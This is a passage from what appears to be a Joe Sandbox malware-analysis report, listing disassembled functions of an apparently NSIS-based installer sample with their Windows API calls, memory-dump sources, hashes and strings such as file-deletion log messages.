                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                            • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                            Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                            • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                            • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                                            Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                            • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                            • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                            Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                            • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                            • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                                                                                                            Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                            • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                                                                                                            Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                            • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                                                                                                            Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                            • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                            • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                            Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                            • String ID: $ @$M$N
                                                                                                                                                                                                                                                                            • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                            • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                            • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                            Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                            • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                            • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                            • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                            • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                            • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                            • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                            • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                            • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                            • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                            Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                            • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                              • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
